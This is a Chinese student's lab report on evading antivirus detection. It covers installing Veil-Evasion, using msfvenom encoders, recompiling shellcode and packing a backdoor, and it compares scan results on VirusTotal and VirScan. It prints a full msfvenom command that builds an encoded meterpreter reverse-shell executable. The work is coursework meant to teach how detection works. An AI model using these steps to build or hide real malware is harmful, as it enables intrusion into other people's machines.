实验三 免杀实践 赵文昊20155104

实验三 病毒免杀技术实践

环境搭建

在作实验以前试过好多方法在Kali中下载veil-evasion这款后门加壳的软件，最后在度娘的帮助下终于装上了，在这里给你们提供一个比较有效的安装方法（注：开发源加上中科大和阿里云等等）

apt-get clean

apt-get update

apt-get upgrade -y

apt-get install veil-evasion

veil-evasion

在安装Veil-evasion的过程当中可能会报错，但只要安装程序不退出就不要着急，有些错误是没关系的。在跳出安装界面的时候只须要不停地Next便可，界面也会出现不少乱码的字符因此就不要尝试读懂了-_-||
过程时间很长，推荐你们提早准备好实验软件，方便跟上老师的脚步。

实验要求和原理

这边是本身上理论课的收获，可能有错……大概吧……
所谓免杀，就是避免杀毒软件检测出咱们传送的带病毒文件，而后，这个文件就能够不那么尴尬地被杀毒软件马上Kill掉，是提高实用性的关键一步（但愿我不会用到他）。
大部分杀毒软件是依赖特征码检测，因此最简单的免杀方式天然就是让这些特征码隐藏起来，等到咱们执行它的时候，程序的原本面目再暴露出来。若是咱们只有可执行文件，那咱们须要给这个文件加壳。若是咱们有shellcode，咱们能够用encode编码或者payload从新编译它。若是咱们有源码，那就简单不少，咱们直接用其余语言重写再编译，不一样编程语言所呈现的带病毒文件差异会很是大，特征码也会消失，这样也能够达到目的。
我打算就用实验二中那个后门软件开刀，尝试一下咱们制做的免杀是否有效果。
检测方式就是咱们找到的两个网站，从此有什么不肯定的文件也能够丢进去检测一下，网站会给出一个比较可信的答复。
https://www.virustotal.com/
http://www.virscan.org/
后面给你们展现效果。

实验步骤

1 先用一下msfvenom编码器

咱们先把上个实验作出来的后门扔进检测网站试一下。
很尴尬，这文件刚放进Windows，就被腾讯管家关小黑屋了。
从小黑屋放出来就能够了，咱们分别放进两个网站检查一下，看起来杀毒软件仍是比较厉害的（记住这几个没检测出来的，之后仍是不用了）。

接下来，开始作免杀，让咱们看一下效果怎么样。
编码器，让咱们多编几回码，结果天然是没什么变化的。。。

msfvenom -p windows/meterpreter/reverse_tcp -x ./20155104.exe -i 5 -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.74 LPORT=5104 -f exe > 20155104_backdoor.exe

2 试试Veil-evasion

Veil-evasion是一个免杀平台，让咱们试一下
我使用的版本是3.1.1，跟旧版本可能有一些不一样的地方。
打开Veil-evasion，能够查看已加载的payload，有41个！
选择其中一个开始制做！我选的跟教程同样是21号。选好后是这样的！

在这里要设置一些信息，我把LocalHost设置成了本身的IP地址，而且把LocalPort设置成本身的学号。

最后给本身的程序起一个名字，而后完成，若是显示这样一个界面，咱们的成品大概就制做好了！

在这个界面下依然会显示作好的文件路径，必定要记得复制一下！否则一会会头疼的。
好了，看一下，把东西拿出来，再放到网站上试一下。

能够看出来这个免杀是有那么些效果的。。。（虽然仍是有很多能检测出来）

4 shellcode再编译，这个手工操做就有点费劲了

先生成一个c语言格式的shellcode

再编一个C语言编程的程序，简单一点用到这段生成的字符串便可，不用想的那么复杂。（因代码具备攻击性因此暂不显示了，有兴趣的本身摸索制做）

扔进网站，查得这样的结果，比预想的还要更好一些哦！

5 加壳

这段操做起来比较简单，须要咱们提早准备一个有病毒的可执行文件（这里就决定是刚才生成的那个文件啦！）

老规矩，扔进网站，检查一下！

看得出来，这个效果不是很好，简单的加壳并不能给免杀带来太多的好处。

实验感想

免杀这个实验是提高实用性很关键的一堂课，这使咱们攻击一个广泛的正常使用的机器成为了可能，虽然尚未达到没法防护的地步，可是通过一些诱导后，广泛的机器已经能够被咱们入侵。可是，要想真正达到职业黑客的水平，这些仍是不够的，咱们目前没法让这病毒自启动，并将咱们的操做提高到一个管理员或者说是root权限上，还有不少须要学习的地方。 杀毒软件的运做机制是咱们考虑如何入侵的一个重要信息，咱们要充分了解杀软才能避开检测，矛和盾是相互促进，必须相互了解才能够提升，这个实验也同时告诉了咱们怎么更有效地进行防护。